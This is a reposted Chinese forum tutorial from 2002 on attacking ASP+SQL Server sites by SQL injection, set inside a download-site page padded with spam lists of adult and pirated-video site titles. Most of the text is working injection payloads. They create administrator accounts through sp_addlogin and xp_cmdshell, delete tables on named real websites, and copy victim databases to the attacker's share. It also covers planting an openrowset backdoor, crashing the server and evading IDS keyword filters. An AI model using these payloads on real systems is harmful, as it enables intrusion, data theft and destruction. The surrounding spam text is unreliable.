韩剧1988免费观看全集_久久影视三级福利片_亚洲视频在线观看免费_在线观看欧美日韩_国产亚洲激情在线_亚洲精品美女久久久_欧美国产日韩一区二区在线观看_91在线观看免费高清完整版在线观看_日韩av免费看_国产又爽又黄的激情精品视频_琪琪亚洲精品午夜在线_欧美性猛xxx_不卡毛片在线看_国产亚洲日本欧美韩国_91国内在线视频_精品国产福利视频

當(dāng)前位置:蘿卜系統(tǒng)下載站 > 技術(shù)開發(fā)教程 > 詳細(xì)頁面

SQL數(shù)據(jù)庫的一些攻擊(轉(zhuǎn))

SQL數(shù)據(jù)庫的一些攻擊(轉(zhuǎn))

更新時(shí)間:2021-11-16 文章作者:未知 信息來源:網(wǎng)絡(luò) 閱讀次數(shù):

SQL數(shù)據(jù)庫的一些攻擊

具體內(nèi)容:


  對(duì)于國內(nèi)外的很多新聞,BBS和電子商務(wù)網(wǎng)站都采用ASP+SQL設(shè)計(jì),而寫 ASP的程序員很多(有很多剛剛畢業(yè)的),所以,ASP+SQL的攻擊成功率

也比較高。這類攻擊方法與NT的版本和SQL的版本沒有多大的關(guān)系,也沒有相應(yīng)的補(bǔ)丁,因?yàn)槁┒词浅绦騿T自己造成的,而且大多數(shù)講解ASP編

程的書上,源代碼例子就有這個(gè)漏洞存在,其實(shí)只是一些合法的ASP對(duì)SQL的請(qǐng)求,就留下后患無窮!
這種攻擊方法最早源于or1=1的漏洞(我們暫且稱其為漏洞),這個(gè)漏洞的原理我想大家因該都知道了,那么隨之而來的便是;exec

sp_addlogin hax(在數(shù)據(jù)庫內(nèi)添加一個(gè)hax用戶),但是這個(gè)方法的限制很大,首先ASP使用的SQL Server賬號(hào)是個(gè)管理員,其次請(qǐng)求的提交變

量在整個(gè)SQL語句的最后,因?yàn)橛幸恍┏绦騿T采用SELECT * FROM news WHERE id=... AND topic=... AND .....
這種方法請(qǐng)求數(shù)據(jù)庫,那么如果還用以上的例子就會(huì)
news.asp?id=2;exec sp_addlogin hax
變成SELECT * FROM news WHERE id=2;exec sp_addlogin hax AND topic=... AND ...
整個(gè)SQL語句在執(zhí)行sp_addlogin的存儲(chǔ)過程后有AND與判斷存在,語法錯(cuò)誤,你的sp_addlogin自然也不能正常運(yùn)行了,因此試試看下面這個(gè)方


news.asp?id=2;exec sp_addlogin hax;--
后面的--符號(hào)把sp_addlogin后的判斷語句變成了注釋,這樣就不會(huì)有語法錯(cuò)誤了,sp_addlogin正常執(zhí)行!
那么我們連一起來用吧
news.asp?id=2;exec master.dbo.sp_addlogin hax;--
news.asp?id=2;exec master.dbo.sp_password null,hax,hax;--
news.asp?id=2;exec master.dbo.sp_addsrvrolemember sysadmin hax;--
news.asp?id=2;exec master.dbo.xp_cmdshell net user hax hax /workstations:* /times:all /passwordchg:yes /passwordreq:yes

/active:yes /add;--
news.asp?id=2;exec master.dbo.xp_cmdshell net localgroup administrators hax /add;--
這樣,你在他的數(shù)據(jù)庫和系統(tǒng)內(nèi)都留下了hax管理員賬號(hào)了
當(dāng)然,前提條件是ASP用管理員賬號(hào),所以虛擬空間大家就別試了,不會(huì)存在這個(gè)漏洞的。
以后我們會(huì)討論,如果對(duì)方的ASP不是用SQL管理員賬號(hào),我們?nèi)绾稳肭,?dāng)然也會(huì)涉及到1433端口的入侵
當(dāng)然大家可以試試看在id=2后面加上一個(gè)符號(hào),主要看對(duì)方的ASP怎么寫了


再說說當(dāng)ASP程序使用的SQL賬號(hào)不是管理員的時(shí)候我們?cè)撊绾巫觥?
你如天融信的主頁,有新聞內(nèi)容,如下:
http://www.talentit.com.cn/news/news-2.asp?newid=117
大家可以試試看http://www.talentit.com.cn/news/news-2.asp?newid=117;select 123;--
呵呵,報(bào)語法錯(cuò)誤,select 123錯(cuò)誤,顯而易見,天融新的ASP在newid變量后面用號(hào)結(jié)束
那么試試看http://www.talentit.com.cn/news/news-2.asp?newid=117;delete news;--
哈哈,我想只要表名猜對(duì)了,新聞庫就被刪了

通常ASP用的SQL賬號(hào)就算不是管理員也會(huì)是某個(gè)數(shù)據(jù)庫的owner,至少對(duì)于這個(gè)庫有很高的管理權(quán)限
但是我們不知道庫名該怎么?看看db_name()函數(shù)吧
打開你的query analyzer,看看print db_name() ,呵呵,當(dāng)前的數(shù)據(jù)庫名就出來了
以次類推,如下: declare @a sysname;set @a=db_name();backup database @a to disk=你的IP你的共享目錄bak.dat ,name=test;--
呵呵,他的當(dāng)前數(shù)據(jù)庫就備份到你的硬盤上了,接下來要做的大家心里都明白了吧
同理這個(gè)方法可以找到對(duì)方的SQL的IP
先裝一個(gè)防火墻,打開ICMP和139TCP和445TCP的警告提示
然后試試看news.asp?id=2;exec master.dbo.xp_cmdshell ping 你的IP
如果防火墻提示有人ping你,那么因該可以肯定對(duì)方的ASP用的是SQL的管理員權(quán)限,同時(shí)也確定了對(duì)方的SQL Server的準(zhǔn)確位置,因?yàn)楹芏啻?

一點(diǎn)的網(wǎng)站考慮性能,會(huì)吧web服務(wù)和數(shù)據(jù)庫分開,當(dāng)對(duì)方大上了補(bǔ)丁看不到源代碼時(shí),我想只有這個(gè)方法能很快的定位對(duì)方的SQL Server的位

置了
那么,如果對(duì)方ASP沒有SQL管理員權(quán)限,我們就不能調(diào)用xp_cmdshell了,該怎么辦?
別著急,試試看這個(gè)news.asp?id=2;declare @a;set @a=db_name();backup database @a to disk=你的IP你的共享目錄bak.dat

,name=test;--
呵呵,你的防火墻該發(fā)出警告了,有人連接你的445或139(win9端口了,這樣,對(duì)方的SQL的ip一樣也可以暴露
那么如果對(duì)方連某個(gè)數(shù)據(jù)庫的owner也不是的話,我們?cè)撛趺崔k?下次我會(huì)告訴大家一個(gè)更好的辦法。
其實(shí)backuo database到你的硬盤還是有點(diǎn)夸張了,如果對(duì)方數(shù)據(jù)庫很龐大,你又是撥號(hào)上網(wǎng),呵呵,勸你別試了,很難成功傳輸?shù)?
下次我們還會(huì)談到如何騙過IDS執(zhí)行ASP+SQL入侵
目前有些好的IDS已經(jīng)開始監(jiān)視xp_cmdshell這些關(guān)鍵字了
好吧,同志們下次見


所有以上url希望大家通過vbscript提交,因?yàn)闉g覽器的地址欄會(huì)屏蔽一些特殊字符,這樣你的命令就不能完整傳輸了
window.location.herf=URL

補(bǔ)充:這個(gè)問題以前載網(wǎng)上也提出來過,但是只是一些簡(jiǎn)單的xp_cmdshell調(diào)用限制很大,其實(shí)這里面還有很多值得深入的地方比如

www.guosen.com.cn。國信證卷就有這個(gè)問題,而且他們采用ms的三層結(jié)構(gòu)作的用以前說的xp_cmdshell做法就不行了,字符串會(huì)被過濾,但是

我嘗試了,用sql的異類請(qǐng)求仍然可以在對(duì)方的機(jī)器上開啟telnet服務(wù)和administrators組的賬號(hào)!由于對(duì)方防火墻很嚴(yán)checkpoint數(shù)據(jù)報(bào)進(jìn)出

都只開放80端口因此,要想獲得他的數(shù)據(jù)庫結(jié)構(gòu)比較困難了,但是還是有辦法可以做到的:P
順便提醒大家注意一下關(guān)于sqloledb,db_name,openrowset,opendatasource這些系統(tǒng)函數(shù)當(dāng)asp的sqlserver賬號(hào)只是一個(gè)普通用戶時(shí),他們會(huì)

很有用的!


sql server新漏洞和一些突破口


下面我要談到一些sqlserver新的bug,雖然本人經(jīng)過長(zhǎng)時(shí)間的努力,當(dāng)然也有點(diǎn)幸運(yùn)的成分在內(nèi),才得以發(fā)現(xiàn),不敢一個(gè)人獨(dú)享,拿出來請(qǐng)大家

鑒別,當(dāng)然很有可能有些高手早已知道了,畢竟我接觸sqlserver的時(shí)間不到1年:P

1。關(guān)于openrowset和opendatasource
可能這個(gè)技巧早有人已經(jīng)會(huì)了,就是利用openrowset發(fā)送本地命令
通常我們的用法是(包括MSDN的列子)如下
select * from openrowset(sqloledb,myserver;sa;,select * from table)
可見(即使從字面意義上看)openrowset只是作為一個(gè)快捷的遠(yuǎn)程數(shù)據(jù)庫訪問,它必須跟在select后面,也就是說需要返回一個(gè)recordset
那么我們能不能利用它調(diào)用xp_cmdshell呢?答案是肯定的!
select * from openrowset(sqloledb,server;sa;,set fmtonly off exec master.dbo.xp_cmdshell dir c:\)
必須加上set fmtonly off用來屏蔽默認(rèn)的只返回列信息的設(shè)置,這樣xp_cmdshell返回的output集合就會(huì)提交給前面的select顯示,如果采用

默認(rèn)設(shè)置,會(huì)返回空集合導(dǎo)致select出錯(cuò),命令也就無法執(zhí)行了。
那么如果我們要調(diào)用sp_addlogin呢,他不會(huì)像xp_cmdshell返回任何集合的,我們就不能再依靠fmtonly設(shè)置了,可以如下操作
select * from openrowset(sqloledb,server;sa;,select OK! exec master.dbo.sp_addlogin Hectic)
這樣,命令至少會(huì)返回select OK!的集合,你的機(jī)器商會(huì)顯示OK!,同時(shí)對(duì)方的數(shù)據(jù)庫內(nèi)也會(huì)增加一個(gè)Hectic的賬號(hào),也就是說,我們利用

select OK!的返回集合欺騙了本地的select請(qǐng)求,是命令能夠正常執(zhí)行,通理sp_addsrvrolemember和opendatasource也可以如此操作!至于

這個(gè)方法真正的用處,大家慢慢想吧:P

2。關(guān)于msdasql兩次請(qǐng)求的問題
不知道大家有沒有試過用msdasql連接遠(yuǎn)程數(shù)據(jù)庫,當(dāng)然這個(gè)api必須是sqlserver的管理員才可以調(diào)用,那么如下
select * from openrowset(msdasql,driver={sql

server};server=server;address=server,1433;uid=sa;pwd=;database=master;network=dbmssocn,select * from table1 select * from

table2)
當(dāng)table1和table2的字段數(shù)目不相同時(shí),你會(huì)發(fā)現(xiàn)對(duì)方的sqlserver崩潰了,連本地連接都會(huì)失敗,而系統(tǒng)資源占用一切正常,用pskill殺死

sqlserver進(jìn)程后,如果不重啟機(jī)器,sqlserver要么無法正常啟動(dòng),要么時(shí)常出現(xiàn)非法操作,我也只是碰巧找到這個(gè)bug的,具體原因我還沒有

摸透,而且很奇怪的是這個(gè)現(xiàn)象只出現(xiàn)在msdasql上,sqloledb就沒有這個(gè)問題,看來問題不是在于請(qǐng)求集合數(shù)目和返回集合數(shù)目不匹配上,因

該還是msdasql本身的問題,具體原因,大家一起慢慢研究吧:P

3。可怕的后門
以前在網(wǎng)上看到有人說在sqlserver上留后門可以通過添加triger,jobs或改寫sp_addlogin和sp_addsrvrolemember做到,這些方法當(dāng)然可行,

但是很容易會(huì)被發(fā)現(xiàn)。不知道大家有沒有想過sqloledb的本地連接映射。呵呵,比如你在對(duì)方的sqlserver上用sqlserver的管理員賬號(hào)執(zhí)行如

下的命令
select * from openrowset(sqloledb,trusted_connection=yes;data source=Hectic,set fmtonly off exec master..xp_cmdshell

dir c:\)
這樣在對(duì)方的sqlserver上建立了一個(gè)名為Hectic的本地連接映射,只要sqlserver不重啟,這個(gè)映射會(huì)一直存在下去,至少我現(xiàn)在還不知道如

何發(fā)現(xiàn)別人放置的連接映射
,好了,以上的命令運(yùn)行過后,你會(huì)發(fā)現(xiàn)哪怕是sqlserver沒有任何權(quán)限的guest用戶,運(yùn)行以上這條命令也一樣能通過!而且權(quán)限是

localsystem。J(rèn)安裝)呵呵!這個(gè)方法可以用來在以被入侵過獲得管理員權(quán)限的sqlserver上留下一個(gè)后門了。

以上的方法在sqlserver2000+sqlserver2000SP1上通過!

*另外還有一個(gè)猜測(cè),不知道大家有沒有注意過windows默認(rèn)附帶的兩個(gè)dsn,一個(gè)是localserver一個(gè)是msqi,這兩個(gè)在建立的時(shí)候是本地管理

員賬號(hào)連接sqlserver的,如果對(duì)方的sqlserver是通過自定義的power user啟動(dòng),那么sa的權(quán)限就和power user一樣,很難有所大作為,但是

我們通過如下的命令
select * from openrowset(msdasql,dsn=locaserver;trusted_connection=yes,set fmtonly off exec master..xp_cmdshell dir

c:\)應(yīng)該可以利用localserver的管理員賬號(hào)連接本地sqlserver然后再以這個(gè)賬號(hào)的權(quán)限執(zhí)行本地命令了,這是后我想應(yīng)該能突破sa那個(gè)

power user權(quán)限了。現(xiàn)在的問題是sqloledb無法調(diào)用dsn連接,而msdasql非管理員不讓調(diào)用,所以我現(xiàn)在正在尋找guest調(diào)用msdasql的方法,

如果有人知道這個(gè)bug如何突破,或有新的想法,我們可以一起討論一下,這個(gè)發(fā)放如果能成功被guest利用,將會(huì)是一個(gè)很嚴(yán)重的安全漏洞。

因?yàn)槲覀兦懊嫣岬降娜魏蝧ql語句都可以提交給對(duì)方的asp去幫我們執(zhí)行:P


利用t-sql騙過ids或攻擊ids


現(xiàn)在的ids已經(jīng)變得越來越聰明了
有的ids加入了xp_cmdshell sp_addlogin 的監(jiān)視
但是畢竟人工智能沒有出現(xiàn)的今天,這種監(jiān)視總是有種騙人的感覺
先說說欺騙ids:
ids既然監(jiān)視xp_cmdshell關(guān)鍵字,那么我們可以這么做
declare @a sysname set @a="xp_"+"cmdshell" exec @a dir c:\
這個(gè)代碼象性大家都能看明白,還有xp_cmdshell作為一個(gè)store procedure在master庫內(nèi)有一個(gè)id號(hào),固定的,我們也可以這么做
假設(shè)這個(gè)id=988456
declare @a sysname select @a=name from sysobjects where id=988456 exec @a dir c:\
當(dāng)然也可以
declare @a sysname select @a=name from sysobjects where id=988455+1 exec @a dir c:\
這種做法排列組合,ids根本不可能做的到完全監(jiān)視
同理,sp_addlogin也可以這么做
再說說攻擊ids:
因?yàn)閕ds數(shù)據(jù)量很大,日至通常備份到常規(guī)數(shù)據(jù)庫,比如sql server
如果用古老的recordset.addnew做法,會(huì)嚴(yán)重影響ids的性能,因?yàn)橥ㄟ^ado做t-sql請(qǐng)求,不但效率高,而且有一部分工作可以交給sql server

去做
通常程序會(huì)這么寫
insert table values (日至內(nèi)容,...)
那么我么想想看,如果用
temp) exec xp_cmdshell dir c:\ --
提交后會(huì)變成
insert table values (日至內(nèi)容....temp) exec xp_cmdshell dir c:\ -- )
這樣,xp_cmdshell就可以在ids的數(shù)據(jù)庫運(yùn)行了 :)
當(dāng)然ids是一個(gè)嗅嘆器,他會(huì)抓所有的報(bào),而瀏覽器提交的時(shí)候會(huì)把空格變成%20
因此,%20會(huì)被提交到sql server,這樣你的命令就無法執(zhí)行了
唯一的辦法就是
insert/**/table/**/values(日至內(nèi)容....temp)/**/exec/**/xp_cmdshell/**/dir c:\/**/-- )
用/**/代替空格做間隔符,這樣你的t-sql才能在ids的數(shù)據(jù)庫內(nèi)執(zhí)行
淡然也可以用其他語句,可以破壞,備份ids的數(shù)據(jù)庫到你的共享目錄
呵呵
其實(shí)這種方法的原理和攻擊asp是一樣的,只是把空格變成了/**/
本來asp是select語句,那么用就可以屏蔽
現(xiàn)在ids用insert語句,那么用)屏蔽

好了,其他很多新的入侵語句大家可以自己慢慢想,最好的測(cè)試工具就是query analyzer了。

注:szw 發(fā)表于 2002-01-15 08:21:02 HACKER 中國網(wǎng)絡(luò)技術(shù)聯(lián)盟論壇

溫馨提示:喜歡本站的話,請(qǐng)收藏一下本站!

本類教程下載

系統(tǒng)下載排行

網(wǎng)站地圖xml | 網(wǎng)站地圖html
亚洲午夜国产一区99re久久| 免费观看一级欧美片| 亚洲视频第二页| 亚洲精品永久免费| 乱色精品无码一区二区国产盗| 久久久久噜噜噜亚洲熟女综合| 久草这里只有精品视频| 性鲍视频在线观看| 丰满岳乱妇dvd日本| 岛国中文字幕在线| 成人黄色午夜影院| 疯狂欧洲av久久成人av电影| 成人亚洲欧美一区二区三区| 视频一区二区三区在线| 男人免费av| 成人18在线| 国产毛片在线| 国产高清不卡一区二区| 日韩免费观看高清完整版在线观看| 99久久婷婷国产综合精品首页| 女同性αv亚洲女同志| 日本一区不卡| 私库av在线播放| 伊人av在线| 成视频在线观看免费观看| 欧美色网一区| 亚洲不卡在线播放| 在线看你懂得| 国产一区二区视频网站| 日韩精品久久久久久免费| av日韩免费电影| 欧美一区二区在线免费播放| 久久久久久亚洲精品不卡4k岛国| 可以在线看黄的网站| 国产一区二区三区成人欧美日韩在线观看| 香蕉视频在线观看www| 欧美色电影在线| 日韩你懂的在线播放| 久久一区二区三区国产精品| 亚洲小说图片区| 精品日韩av| 亚洲欧美国产一区二区| 久热精品视频在线播放| 四虎884aa成人精品| 91入口在线观看| www.成人影院| 亚洲国产午夜伦理片大全在线观看网站| 久久偷看各类wc女厕嘘嘘偷窃| 欧美大电影免费观看| 欧美人与动牲交xxxxbbbb| 国产精品亚洲一区二区三区妖精| 91老师片黄在线观看| 91在线电影| 国产成人亚洲精品无码h在线| 日本大片免费看| 中文字幕第24页| 被下部羞羞漫画| 欧美精品色视频| 激情黄产视频在线免费观看| 久久久久久一区二区三区| 香蕉国产在线| 色窝窝无码一区二区三区| 国产亚洲精品自在线观看| 国产成人在线综合| 久草视频视频在线播放| 久久久久久久久久久久久久一区| 狠狠色噜噜狠狠狠狠色吗综合| 国内成+人亚洲+欧美+综合在线| 亚洲网站啪啪| 97视频在线观看免费高清完整版在线观看| 精品视频在线观看一区| 国产不卡av在线免费观看| 免费91在线观看| 国产大片精品免费永久看nba| 欧美一区综合| 午夜3点看的视频| 中文字幕在线观看免费| 国产精品久久久久永久免费观看| 中文字幕国产亚洲| 91九色国产在线| 国内精品伊人| 亚洲一区二区三区激情| 欧美熟女一区二区| 九九爱精品视频| 男女污污视频网站| baoyu135国产精品免费| 91精品国产91久久久| 婷婷激情一区| 视频一区视频二区视频三区视频四区国产| 日韩一区有码在线| 精品伊人久久97| 国产伦精品一区二区三区视频小说| 久久精品国产清自在天天线| 欧美一区亚洲| 777久久久精品| 在线观影网站| 欧美日韩一区在线观看视频| av基地在线| 国产成人无遮挡在线视频| 亚洲黄页一区| 在线观看免费视频你懂的| 亚洲最大av| 免播放器亚洲一区| 成人午夜免费在线观看| 午夜cr在线观看高清在线视频完整版| 极品尤物av久久免费看| 欧美私模裸体表演在线观看| 国产高清在线精品| 亚洲国产精品三区| 久久亚洲综合国产精品99麻豆精品福利| 色图欧美色图| 国产xxxx做受性欧美88| 欧美在线一区二区视频| 久久精品国产96久久久香蕉| 欧美视频一区二区| 免费在线黄色片| 网爆门在线观看| 亚洲国产视频一区二区三区| 国产精品免费无码| 91在线资源| 亚洲午夜久久久久久久久久久| 日韩欧美亚洲v片| 欧美欧美天天天天操| 欧美亚洲精品一区| 日韩欧美视频免费在线观看| 91精品人妻一区二区| 亚洲人成无码www久久久| 成人午夜大片免费观看| 搞黄网站免费观看| 欧美极品美女电影一区| 精品成人乱色一区二区| 91超碰国产精品| 婷婷丁香激情综合| 亚洲国产精品嫩草影院久久av| 亚洲欧美偷拍卡通变态| 日韩欧美专区在线| 婷婷综合久久| 污视频在线观看免费网站| 成人在线中文| 手机在线观看av网站| 在线观看精品一区二区三区| 91淫黄看大片| 午夜天堂在线视频| 亚洲免费视频中文字幕| 亚洲欧美国产77777| 亚洲免费久久| 免费av一区二区| 欧美孕妇性xxxⅹ精品hd| yy6080久久伦理一区二区| 国产美女精彩久久| 欧美国产一区在线| 日本亚洲色大成网站www久久| 一本色道久久综合狠狠躁篇的优点| 国产v日产∨综合v精品视频| 中文字幕第2页| 丁香婷婷综合五月| 成人p站proumb入口| 国产精品久久久久久久久久妞妞| 亚洲天堂中文字幕在线观看| 精品伦精品一区二区三区视频密桃| 国产天堂视频| 诱人的瑜伽老师3hd中字| 亚洲国产日韩一区无码精品久久久| 人妻换人妻a片爽麻豆| 色视频www在线播放国产成人| 久热免费在线观看| 亚洲高清久久网| 国产美女亚洲精品7777| 草裙成人精品一区二区三区| 日本欧美中文字幕| 精选一区二区三区四区五区| 亚洲无码精品在线播放| 日本三级韩国三级欧美三级| 精品无人区无码乱码毛片国产| 国产亚洲精品中文字幕| 99精产国品一二三产品香蕉| eeuss影院95999部| 波多野结衣 久久| 精品肉丝脚一区二区三区| 欧美成人精品三级在线观看| 国产资源在线看| 国产日韩欧美另类| 国产成人自拍高清视频在线免费播放| 亚洲激情自拍图| 麻豆精品久久久| 国产日韩精品一区二区三区在线| 中文字幕av影院| 青草影视电视剧免费播放在线观看| 国产成人高潮免费观看精品| 久草成人资源| 毛片免费在线观看| 国产伦精品一区三区精东| 久久久一本精品99久久精品66| 国产又粗又猛又爽又黄av| 91精品天堂福利在线观看| 538国产精品一区二区在线| 风间由美一区二区av101| xxx成人少妇69| 正在播放一区二区三区| 久久久久久久久久久久久久| 日韩a一级欧美一级| 亚洲青青久久| 欧美色偷偷大香| 久久久999国产| 欧美另类极品videosbest视| 久久久久狠狠高潮亚洲精品| 欧美精品乱码久久久久久| 欧美阿v一级看视频| 日韩mv欧美mv国产网站| 中文字幕第一区二区| 亚洲精品91美女久久久久久久| а√天堂中文在线资源8| 乱人伦中文字幕在线zone| 在线精品视频播放| 亚洲精品写真福利| 一色屋免费视频| 国产精品毛片一区二区在线看舒淇| 999视频在线免费观看| 亚洲欧洲精品在线| 亚洲三级小视频| 精品国产导航| 久久综合九色综合欧美就去吻| 丁香六月激情婷婷| 美女精品视频| 性8sex亚洲区入口| 精品爽片免费看久久| 少妇av一区二区三区无码| 在线观看国产精品网站| 国产成人av一区二区三区在线| 国产人妻精品一区二区三| 大胆人体一区| 亚洲蜜桃精久久久久久久| 一本色道久久综合无码人妻| 免费观看一级特黄欧美大片| 久久99国产乱子伦精品免费| 国产精品一区二区三区久久| 精品香蕉一区二区三区| 精精国产xxxx视频在线播放| y111111国产精品久久婷婷| 国产色婷婷在线| 午夜精品久久久久久久91蜜桃| 99re6这里有精品热视频| 国产乱了高清露脸对白| 欧美日韩精品区| 日韩av一级大片| 欧美性生活大片免费观看网址| 色婷婷综合激情| av中文字幕一区二区| 久久这里有精品| 国产不卡在线视频| 擼擼色在线看观看免费| 久久亚洲精品国产| 中文字幕无码毛片免费看| 蜜桃视频成人在线观看| 亚洲自拍欧美另类| 91免费版在线| 午夜精品久久久久久久蜜桃| 精品日韩免费| 日韩久久免费视频| 中文字幕一区二区三区乱码不卡| 99热国内精品| 亚洲一区精品视频| xxxx日本少妇| 26uuu亚洲综合色欧美| 国产精品福利在线观看网址| 97人妻精品一区二区三区视频| 亚洲福利在线视频| 好男人在线视频www| 日韩电影网在线| 久草成色在线| 国产精品sm调教免费专区| 亚洲av人人澡人人爽人人夜夜| 99riav1国产精品视频| 波多野结衣不卡| 亚洲高清精品视频| 男人天堂手机在线视频| 国产精品亚洲一区二区无码| 中文字幕无码精品亚洲35| 男插女免费视频| 日韩电影中文字幕av| 中国精品18videos性欧美| 欧美激情高清视频| 私人影视中文字幕| 在线观看成人动漫| 亚洲18在线看污www麻豆| 国产白浆在线免费观看| 欧美日韩久久久一区| 精品国产麻豆免费人成网站| 欧美一区二区三区小说| 精品国语对白精品自拍视| 日本午夜精品| 三上悠亚久久精品| fc2在线中文字幕| 久久久久久亚洲精品中文字幕| 啊灬啊灬啊灬啊灬高潮在线看| 男人的天堂av社区在线| 天堂va在线高清一区| 中文字幕自拍vr一区二区三区| 男人天堂新网址| 伊人久久视频| 欧美色视频日本版| 日韩精品一区二区三区四区视频| 色综合久久66| 亚洲国产日韩a在线播放| 日韩中文字幕免费观看| www.在线视频.com| 日本丰满少妇xxxx| 北条麻妃亚洲一区| 日韩一区二区三区观看| 亚洲va在线va天堂| 亚洲综合伊人| 人人澡人人爽| 成人综合社区| 欧美一级黑人aaaaaaa做受| 香蕉视频一区二区三区| 日韩在线看片| 男人操女人免费软件| 欧美黑人粗大| 亚洲电影一区二区三区| 成人久久一区二区| 日韩欧美中文字幕公布| 少妇精品一区二区三区| 性xxxx18| 女人偷人在线视频| 国产免费久久久| 91九色在线porn| 日韩一区欧美小说| 91免费福利视频|